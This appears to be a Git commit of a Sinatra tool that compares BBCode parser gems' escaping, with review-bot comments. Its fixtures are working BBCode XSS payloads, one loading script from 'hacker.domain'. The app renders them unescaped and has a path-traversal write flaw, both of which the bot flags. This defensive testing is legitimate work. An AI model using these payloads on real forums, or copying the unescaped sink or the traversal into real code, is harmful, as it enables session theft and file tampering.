bbcode exploit tester

treetop
Jordan Orelli 9 years ago
commit c67e390c31

@ -0,0 +1,7 @@
source "http://rubygems.org"
gem "sinatra"
gem "thin"
gem "slim"
gem "bb-ruby"
gem "ruby-bbcode"
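Review bot: `source "http://rubygems.org"` fetches gems over plain HTTP, so every dependency in this Gemfile is pulled unauthenticated and can be swapped by anyone on the network path; change it to `source "https://rubygems.org"`. None of the five gems carries a version constraint and no `Gemfile.lock` appears in this commit, so what gets installed depends entirely on the install date; for a tool whose whole purpose is to compare two parser versions' escaping behaviour, pinning at least `bb-ruby` and `ruby-bbcode` (or committing the lockfile) would make results reproducible.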

@ -0,0 +1,85 @@
require 'sinatra'
require 'slim'
require 'digest/sha1'
require 'bb-ruby'
require 'ruby-bbcode'
@@engines = ['bb-ruby', 'ruby-bbcode', 'raw']
get '/' do
@posts = list_posts
@engines = @@engines
slim :index
end
def show_create_page(engine)
get "/#{engine}" do
slim :input
end
end
def get_post(engine)
get "/#{engine}/:slug" do
body = read_post params[:slug]
@engine = 'bb-ruby'
@slug = params[:slug]
@other_engines = @@engines.select{|e| e != engine}
@bbcode_output = exec_bbcode engine, body
slim :output
end
end
def exec_bbcode(engine, body)
case engine
when "bb-ruby"
BBRuby.to_html body
when "ruby-bbcode"
RubyBBCode.to_html body
when "raw"
body
else
raise "unknown engine: #{engine}"
end
end
def create_post(engine)
post "/#{engine}" do
slug = store_post request
redirect to("#{engine}/#{slug}")
end
end
def setup_dir
begin
Dir.mkdir "posts"
rescue
end
end
def slugify(title)
title.downcase.strip.split(" ").join('-')
end
def store_post(request)
setup_dir
title = slugify(request["slug"])
comment = request["comment"]
File.write "posts/#{title}", comment
title
end
def read_post(slug)
file = File.open("posts/#{slug}", "r")
file.read
end
def list_posts
Dir.entries("posts").select{|entry| entry != '.' && entry != '..'}
end
@@engines.each do |engine|
show_create_page engine
get_post engine
create_post engine
end
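Review bot: `store_post` writes to `"posts/#{title}"` with `title` taken straight from the `slug` form field, and `slugify` only lowercases, strips and joins on spaces, so a slug such as `../something` escapes the `posts` directory and lets any client write an arbitrary path with the server's permissions; `read_post` mirrors this on the read side (whether a `..`-bearing value survives Sinatra's `:slug` matching depends on the version's percent-decoding, but the write path is reachable directly from the form). Restrict the slug to a safe alphabet in `store_post` with `halt 400, "bad slug" unless title.match?(/\A[a-z0-9-]+\z/)`, apply the same guard in `read_post`, and replace the `File.open`/`read` pair there with `File.read("posts/#{slug}")`, which also closes the handle the current code leaks. `get_post` hard-codes `@engine = 'bb-ruby'` instead of `@engine = engine`, so the view's "try again" link always points at the bb-ruby form no matter which engine rendered the page. `list_posts` calls `Dir.entries("posts")` but `setup_dir` only runs inside `store_post`, so the first `GET /` before any post has been created raises `Errno::ENOENT`; call `setup_dir` at the top of `list_posts` as well. Finally, `@@engines` at top level is a class variable on `Object`, which newer Ruby (3.0+) rejects with a RuntimeError on toplevel access; a frozen constant `ENGINES = %w[bb-ruby ruby-bbcode raw].freeze` avoids that.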

@ -0,0 +1,2 @@
[color=#ff0000;xss:expression(alert(String.fromCharCode(88,83,83)));]XSS[/color]

@ -0,0 +1 @@
[color=#ff0000;font-size:100px;]XSS[/color]

@ -0,0 +1 @@
[font=Impact, Compacta, Chicago, sans-serif;color:red;]XSS[/font]

@ -0,0 +1,2 @@
[img]fake.png" onerror="alert(String.fromCharCode(88,83,83))[/img]

@ -0,0 +1,2 @@
[img]http://foo.com/fake.png [img] onerror=javascript:alert(String.fromCharCode(88,83,83)) [/img] [/img]

@ -0,0 +1,2 @@
[url]http://google.com?[url] onmousemove=javascript:alert(String.fromCharCode(88,83,83));//[/url][/url]

@ -0,0 +1,2 @@
[table=border='1' cellspacing='0' cellpadding='0' width='100%'][tr=bgcolor='#ffffff'][td=width='*' onmouseover='javascript:alert(String.fromCharCode(88,83,83))']XSS[/td][/tr][/table]

@ -0,0 +1 @@
[url=javascript:t=document.createElement('script');t.src='/alert.js';document.body.appendChild(t);//]test[/url]

@ -0,0 +1 @@
[url=javascript:alert(String.fromCharCode(88,83,83))]http://google.com[/url]

@ -0,0 +1 @@
[youtube=javascript:t=document.createElement('script');t.src='alert.js';document.body.appendChild(t);//]test[/youtube]

@ -0,0 +1 @@
[youtube=javascript:t=document.createElement('script');t.src='//hacker.domain/script.js';document.body.appendChild(t);//]test[/url]

@ -0,0 +1,2 @@
alert("This is an alert. You've been XSSed.");

@ -0,0 +1,21 @@
doctype html
html
head
title pick an engine
body
#content
h1 create a sploit
ul
- @@engines.each do |engine|
li
a href="#{engine}" = engine
#existing
h1 list sploits
table
- @posts.each do |post|
tr
td = post
- @@engines.each do |engine|
td
a href="#{engine}/#{post}" view in #{engine}
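Review bot: Both loops in this template read the class variable `@@engines` even though the `/` route assigns `@engines` for the view, so the instance variable set in the controller is dead and the template couples itself to a toplevel class variable; use `- @engines.each do |engine|` in both places. The post names in the table come from `Dir.entries`, i.e. raw filesystem names; Slim escapes `= post` and attribute interpolation by default, so this stays safe only as long as those escaping defaults are not disabled, which a comment such as `/ post names are filesystem entries; relies on Slim's default escaping` above the table would make explicit.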

@ -0,0 +1,16 @@
doctype html
html
head
title pwn
body
h1 add your dope sploit
form method='post' name='sploit'
label for='slug' slug
br
input name='slug' type='text'
br
label for='comment' bbcode input
br
textarea name='comment' rows=10 cols=80
br
input type='submit'
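Review bot: `label for='slug'` and `label for='comment'` reference ids that no element declares, since the `input` and `textarea` only carry `name=`, so the labels do not bind; change them to `input id='slug' name='slug' type='text'` and `textarea id='comment' name='comment' rows=10 cols=80`. The form has no `action`, so it posts back to whichever `/:engine` page rendered it and depends on `create_post` registering a matching route; a `/ no action: posts to the current engine path, handled by create_post` comment would record that dependency.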

@ -0,0 +1,13 @@
doctype html
html
head
title output
body
#content
== @bbcode_output
ul
li
a href="/#{@engine}" try again
- @other_engines.each do |engine|
li
a href="/#{engine}/#{@slug}" view in #{engine}
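Review bot: `== @bbcode_output` emits the engine output unescaped, and with the `raw` engine that is the submitter's text verbatim, so every stored post is a stored-XSS sink by design; that is the purpose of the tool, but nothing on the page says so and a later maintainer could "fix" it or, worse, expose the app. Add `/ == deliberately unescaped: this page exists to show exactly what each BBCode engine emits, so payloads must execute here` above the line, and state in the app header or README that the server must only ever be bound to localhost.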